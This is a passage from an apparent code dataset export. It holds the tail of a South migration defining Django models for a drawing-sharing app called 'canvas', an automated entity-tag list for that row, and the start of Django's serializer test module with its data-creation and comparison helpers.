('django.db.models.fields.BooleanField', [], {'default': 'True'}), + 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), + 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), + 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), + 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': ""orm['auth.Permission']"", 'symmetrical': 'False', 'blank': 'True'}), + 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) + }, + 'canvas.apiapp': { + 'Meta': {'object_name': 'APIApp'}, + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}) + }, + 'canvas.apiauthtoken': { + 'Meta': {'unique_together': ""(('user', 'app'),)"", 'object_name': 'APIAuthToken'}, + 'app': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.APIApp']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'token': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}) + }, + 'canvas.bestof': { + 'Meta': {'object_name': 'BestOf'}, + 'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'best_of'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Category']""}), + 'chosen_by': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}), + 'comment': 
('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'best_of'"", 'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}) + }, + 'canvas.category': { + 'Meta': {'object_name': 'Category'}, + 'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}), + 'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}), + 'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'founded_groups'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': ""'moderated_categories'"", 'symmetrical': 'False', 'to': ""orm['auth.User']""}), + 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}), + 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) + }, + 'canvas.comment': { + 'Meta': {'object_name': 'Comment'}, + 'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'comments'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}), + 'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'comments'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Category']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'ip': ('django.db.models.fields.IPAddressField', [], {'default': ""'127.0.0.1'"", 'max_length': '15'}), + 'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'replies'"", 'null': 'True', 'blank': 'True', 'to': ""orm['canvas.Comment']""}), + 'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'comments'"", 'null': 'True', 'to': ""orm['canvas.Content']""}), + 'posted_on_quest_of_the_day': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['canvas.Comment']"", 'null': 'True', 'blank': 'True'}), + 'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'used_in_comments'"", 'null': 'True', 'to': ""orm['canvas.Content']""}), + 'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}), + 'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}), + 'skip_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'star_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}), + 'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}), + 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) + }, + 'canvas.commentflag': { + 'Meta': {'object_name': 'CommentFlag'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'flags'"", 'to': 
""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'type_id': ('django.db.models.fields.IntegerField', [], {}), + 'undone': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'flags'"", 'to': ""orm['auth.User']""}) + }, + 'canvas.commentmoderationlog': { + 'Meta': {'object_name': 'CommentModerationLog'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'null': 'True'}), + 'note': ('django.db.models.fields.TextField', [], {}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'moderated_comments_log'"", 'to': ""orm['auth.User']""}), + 'visibility': ('django.db.models.fields.IntegerField', [], {}) + }, + 'canvas.commentpin': { + 'Meta': {'object_name': 'CommentPin'}, + 'auto': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}) + }, + 'canvas.commentsticker': { + 'Meta': {'object_name': 'CommentSticker'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'stickers'"", 'to': ""orm['canvas.Comment']""}), + 'epic_message': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '140', 'blank': 'True'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'type_id': ('django.db.models.fields.IntegerField', [], {}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['auth.User']"", 'null': 'True', 'blank': 'True'}) + }, + 'canvas.commentstickerlog': { + 'Meta': {'object_name': 'CommentStickerLog'}, + 'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}) + }, + 'canvas.content': { + 'Meta': {'object_name': 'Content'}, + 'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}), + 'ip': ('django.db.models.fields.IPAddressField', [], {'default': ""'127.0.0.1'"", 'max_length': '15'}), + 'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': ""'remixes'"", 'null': 'True', 'to': ""orm['canvas.Content']""}), + 'remix_text': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '1000', 'blank': 'True'}), + 'source_url': 
('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '4000', 'blank': 'True'}), + 'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': ""'used_as_stamp'"", 'blank': 'True', 'to': ""orm['canvas.Content']""}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.ContentUrlMapping']"", 'null': 'True', 'blank': 'True'}), + 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) + }, + 'canvas.contenturlmapping': { + 'Meta': {'object_name': 'ContentUrlMapping'}, + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) + }, + 'canvas.emailunsubscribe': { + 'Meta': {'object_name': 'EmailUnsubscribe'}, + 'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) + }, + 'canvas.externalcontent': { + 'Meta': {'object_name': 'ExternalContent'}, + '_data': ('django.db.models.fields.TextField', [], {'default': ""'{}'""}), + 'content_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'external_content'"", 'to': ""orm['canvas.Comment']""}), + 'source_url': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '4000', 'null': 'True', 'blank': 'True'}) + }, + 'canvas.facebookinvite': { + 'Meta': {'object_name': 'FacebookInvite'}, + 'fb_message_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'invited_fbid': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'facebook_invited_from'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}), + 'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'facebook_sent_invites'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}) + }, + 'canvas.facebookuser': { + 'Meta': {'object_name': 'FacebookUser'}, + 'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'fb_uid': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}), + 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'gender': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'last_invited': ('canvas.util.UnixTimestampField', [], {'default': '0'}), + 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': ""orm['auth.User']"", 'unique': 'True', 'null': 'True', 'blank': 'True'}) + }, + 'canvas.followcategory': { + 'Meta': {'unique_together': ""(('user', 'category'),)"", 'object_name': 'FollowCategory'}, + 'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'followers'"", 'to': ""orm['canvas.Category']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'following'"", 'to': ""orm['auth.User']""}) 
+ }, + 'canvas.invitecode': { + 'Meta': {'object_name': 'InviteCode'}, + 'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'invited_from'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}), + 'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': ""'sent_invites'"", 'null': 'True', 'blank': 'True', 'to': ""orm['auth.User']""}) + }, + 'canvas.remixplugin': { + 'Meta': {'object_name': 'RemixPlugin'}, + 'author': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 's3md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}) + }, + 'canvas.stashcontent': { + 'Meta': {'object_name': 'StashContent'}, + 'content': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Content']""}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']""}) + }, + 'canvas.userinfo': { + 'Meta': {'object_name': 'UserInfo'}, + 'avatar': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Content']"", 'null': 'True'}), + 'bio_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}), + 'enable_timeline': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), + 'enable_timeline_posts': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), + 'follower_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}), + 'free_invites': ('django.db.models.fields.IntegerField', [], {'default': '10'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'invite_bypass': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '255', 'blank': 'True'}), + 'is_qa': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'post_anonymously': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'profile_image': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']"", 'null': 'True'}), + 'trust_changed': ('canvas.util.UnixTimestampField', [], {'null': 'True', 'blank': 'True'}), + 'trusted': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}), + 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': ""orm['auth.User']"", 'unique': 'True'}) + }, + 'canvas.usermoderationlog': { + 'Meta': {'object_name': 'UserModerationLog'}, + 'action': ('django.db.models.fields.IntegerField', [], {}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'null': 'True'}), + 'note': ('django.db.models.fields.TextField', [], {}), + 'timestamp': ('canvas.util.UnixTimestampField', [], {}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'moderation_log'"", 'to': ""orm['auth.User']""}) + }, + 'canvas.userwarning': { + 'Meta': {'object_name': 'UserWarning'}, + 
'comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['canvas.Comment']"", 'null': 'True', 'blank': 'True'}), + 'confirmed': ('canvas.util.UnixTimestampField', [], {'default': '0'}), + 'custom_message': ('django.db.models.fields.TextField', [], {}), + 'disable_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'issued': ('canvas.util.UnixTimestampField', [], {}), + 'stock_message': ('django.db.models.fields.IntegerField', [], {'default': '0'}), + 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'user_warnings'"", 'to': ""orm['auth.User']""}), + 'viewed': ('canvas.util.UnixTimestampField', [], {'default': '0'}) + }, + 'canvas.welcomeemailrecipient': { + 'Meta': {'object_name': 'WelcomeEmailRecipient'}, + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'unique': 'True'}) + }, + 'contenttypes.contenttype': { + 'Meta': {'ordering': ""('name',)"", 'unique_together': ""(('app_label', 'model'),)"", 'object_name': 'ContentType', 'db_table': ""'django_content_type'""}, + 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), + 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), + 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), + 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) + } + } + + complete_apps = ['canvas'] +",21701,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'FloatField'], ['DATE_TIME', ""'2000'""], ['PERSON', 'FloatField'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['PERSON', 'RemixPlugin'], ['DATE_TIME', ""'2000'""], ['PERSON', 'follower_count'], ['PERSON', 'UserWarning'], ['PERSON', 'complete_apps'], ['URL', 'auth.gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'auth.pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'contenttypes.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'auth.us'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.be'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 
'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'canvas.ca'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 
'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.fo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.in'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.re'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'canvas.st'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Nu'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'contenttypes.co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch']]" +42,""""""" +A test spanning all the capabilities of all the serializers. + +This class defines sample data and a dynamically generated +test case that is capable of testing the capabilities of +the serializers. This includes all valid data values, plus +forward, backwards and self references. 
+"""""" +from __future__ import unicode_literals + +import datetime +import decimal +from unittest import expectedFailure, skipUnless + +try: + import yaml +except ImportError: + yaml = None + +from django.core import serializers +from django.core.serializers import SerializerDoesNotExist +from django.core.serializers.base import DeserializationError +from django.core.serializers.xml_serializer import DTDForbidden +from django.db import connection, models +from django.http import HttpResponse +from django.test import TestCase +from django.utils import six +from django.utils.encoding import force_text +from django.utils.functional import curry + +from .models import (BinaryData, BooleanData, CharData, DateData, DateTimeData, EmailData, + FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData, + GenericIPAddressData, NullBooleanData, PositiveIntegerData, + PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData, + GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData, + FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData, + Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData, + DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData, + GenericIPAddressPKData, PositiveIntegerPKData, + PositiveSmallIntegerPKData, SlugPKData, SmallPKData, + AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel, + ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel, + ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel, + NaturalKeyAnchor, FKDataNaturalKey) + +# A set of functions that can be used to recreate +# test data objects of various kinds. +# The save method is a raw base model save, to make +# sure that the data in the database matches the +# exact test case. +def data_create(pk, klass, data): + instance = klass(id=pk) + instance.data = data + models.Model.save_base(instance, raw=True) + return [instance] + +def generic_create(pk, klass, data): + instance = klass(id=pk) + instance.data = data[0] + models.Model.save_base(instance, raw=True) + for tag in data[1:]: + instance.tags.create(data=tag) + return [instance] + +def fk_create(pk, klass, data): + instance = klass(id=pk) + setattr(instance, 'data_id', data) + models.Model.save_base(instance, raw=True) + return [instance] + +def m2m_create(pk, klass, data): + instance = klass(id=pk) + models.Model.save_base(instance, raw=True) + instance.data = data + return [instance] + +def im2m_create(pk, klass, data): + instance = klass(id=pk) + models.Model.save_base(instance, raw=True) + return [instance] + +def im_create(pk, klass, data): + instance = klass(id=pk) + instance.right_id = data['right'] + instance.left_id = data['left'] + if 'extra' in data: + instance.extra = data['extra'] + models.Model.save_base(instance, raw=True) + return [instance] + +def o2o_create(pk, klass, data): + instance = klass() + instance.data_id = data + models.Model.save_base(instance, raw=True) + return [instance] + +def pk_create(pk, klass, data): + instance = klass() + instance.data = data + models.Model.save_base(instance, raw=True) + return [instance] + +def inherited_create(pk, klass, data): + instance = klass(id=pk,**data) + # This isn't a raw save because: + # 1) we're testing inheritance, not field behavior, so none + # of the field values need to be protected. + # 2) saving the child class and having the parent created + # automatically is easier than manually creating both. 
+ models.Model.save(instance) + created = [instance] + for klass,field in instance._meta.parents.items(): + created.append(klass.objects.get(id=pk)) + return created + +# A set of functions that can be used to compare +# test data objects of various kinds +def data_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + if klass == BinaryData and data is not None: + testcase.assertEqual(bytes(data), bytes(instance.data), + ""Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)"" % ( + pk, repr(bytes(data)), type(data), repr(bytes(instance.data)), + type(instance.data)) + ) + else: + testcase.assertEqual(data, instance.data, + ""Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)"" % ( + pk, data, type(data), instance, type(instance.data)) + ) + +def generic_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + testcase.assertEqual(data[0], instance.data) + testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by('id')]) + +def fk_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + testcase.assertEqual(data, instance.data_id) + +def m2m_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + testcase.assertEqual(data, [obj.id for obj in instance.data.order_by('id')]) + +def im2m_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + #actually nothing else to check, the instance just should exist + +def im_compare(testcase, pk, klass, data): + instance = klass.objects.get(id=pk) + testcase.assertEqual(data['left'], instance.left_id) + 